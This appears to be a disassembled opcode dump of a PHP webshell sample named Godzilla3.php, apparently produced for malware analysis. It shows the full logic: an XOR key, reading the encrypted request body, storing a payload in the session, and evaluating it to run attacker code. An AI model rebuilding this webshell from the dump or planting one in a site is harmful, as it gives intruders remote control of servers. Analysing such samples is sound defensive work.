|filename:|/root/samples/Godzilla3.php
|functionname:|(null)
|numberofops:|74
|compiledvars:|!0=$payloadName,|!1=$orange,|!2=$data,|!3=$payload
|line|#*|||op|fetch|ext|return|operands
|2|0|E>|BEGIN_SILENCE|||~4|
||1||INIT_FCALL||||'session_start'|
||2||DO_ICALL||||
||3||END_SILENCE||||~4|
|3|4||BEGIN_SILENCE|||~6|
||5||INIT_FCALL||||'set_time_limit'|
||6||SEND_VAL||||0|
||7||DO_ICALL||||
||8||END_SILENCE||||~6|
|4|9||BEGIN_SILENCE|||~8|
||10||INIT_FCALL||||'error_reporting'|
||11||SEND_VAL||||0|
||12||DO_ICALL||||
||13||END_SILENCE||||~8|
|12|14||ASSIGN||||!0|,|'payload'|
|13|15||ASSIGN||||!1|,|'716f6b30598ba309'|
|14|16||INIT_FCALL||||'file_get_contents'|
||17||SEND_VAL||||'php%3A%2F%2Finput'|
||18||DO_ICALL|||$12|
||19||ASSIGN||||!2|,|$12|
|15|20||TYPE_CHECK||1018||!2|
||21|>|JMPZ||||~14|,|->73|
|16|22|>|INIT_FCALL||||'encode'|
||23||SEND_VAR||||!2|
||24||SEND_VAR||||!1|
||25||DO_FCALL||0|$15|
||26||ASSIGN||||!2|,|$15|
|17|27||FETCH_IS|||~17|'_SESSION'|
||28||ISSET_ISEMPTY_DIM_OBJ||0||~17|,|!0|
||29|>|JMPZ||||~18|,|->60|
|18|30|>|INIT_FCALL||||'encode'|
||31||FETCH_R|global||~19|'_SESSION'|
||32||FETCH_DIM_R|||~20|~19|,|!0|
||33||SEND_VAL||||~20|
||34||SEND_VAR||||!1|
||35||DO_FCALL||0|$21|
||36||ASSIGN||||!3|,|$21|
|19|37||INIT_FCALL||||'strpos'|
||38||SEND_VAR||||!3|
||39||SEND_VAL||||'getBasicsInfo'|
||40||DO_ICALL|||$23|
||41||TYPE_CHECK||4||$23|
||42|>|JMPZ||||~24|,|->48|
|20|43|>|INIT_FCALL||||'encode'|
||44||SEND_VAR||||!3|
||45||SEND_VAR||||!1|
||46||DO_FCALL||0|$25|
||47||ASSIGN||||!3|,|$25|
|22|48|>|INCLUDE_OR_EVAL||||!3|,|EVAL|
|23|49||INIT_FCALL||||'encode'|
||50||BEGIN_SILENCE|||~28|
||51||INIT_FCALL_BY_NAME||||'run'|
||52||SEND_VAR_EX||||!2|
||53||DO_FCALL||0|$29|
||54||END_SILENCE||||~28|
||55||SEND_VAR||||$29|
||56||SEND_VAR||||!1|
||57||DO_FCALL||0|$30|
||58||ECHO||||$30|
||59|>|JMP||||->73|
|25|60|>|INIT_FCALL||||'strpos'|
||61||SEND_VAR||||!2|
||62||SEND_VAL||||'getBasicsInfo'|
||63||DO_ICALL|||$31|
||64||TYPE_CHECK||1018||$31|
||65|>|JMPZ||||~32|,|->73|
|26|66|>|INIT_FCALL||||'encode'|
||67||SEND_VAR||||!2|
||68||SEND_VAR||||!1|
||69||DO_FCALL||0|$35|
||70||FETCH_W|global||$33|'_SESSION'|
||71||ASSIGN_DIM||||$33|,|!0|
||72||OP_DATA||||$35|
|30|73|>>|RETURN||||1|
|
|Functionencode:
|filename:|/root/samples/Godzilla3.php
|functionname:|encode
|numberofops:|18
|compiledvars:|!0=$D,|!1=$K,|!2=$i,|!3=$c
|line|#*|||op|fetch|ext|return|operands
|5|0|E>|RECV|||!0|
||1||RECV|||!1|
|6|2||ASSIGN||||!2|,|0|
||3|>|JMP||||->13|
|7|4|>|ADD|||~5|!2|,|1|
||5||BW_AND|||~6|~5|,|15|
||6||FETCH_DIM_R|||~7|!1|,|~6|
||7||ASSIGN||||!3|,|~7|
|8|8||FETCH_DIM_R|||~10|!0|,|!2|
||9||BW_XOR|||~11|!3|,|~10|
||10||ASSIGN_DIM||||!0|,|!2|
||11||OP_DATA||||~11|
|6|12||PRE_INC||||!2|
||13|>|STRLEN|||~13|!0|
||14||IS_SMALLER||||!2|,|~13|
||15|>|JMPNZ||||~14|,|->4|
|10|16|>>|RETURN||||!0|
|11|17|*>|RETURN||||null|
|
|Endoffunctionencode

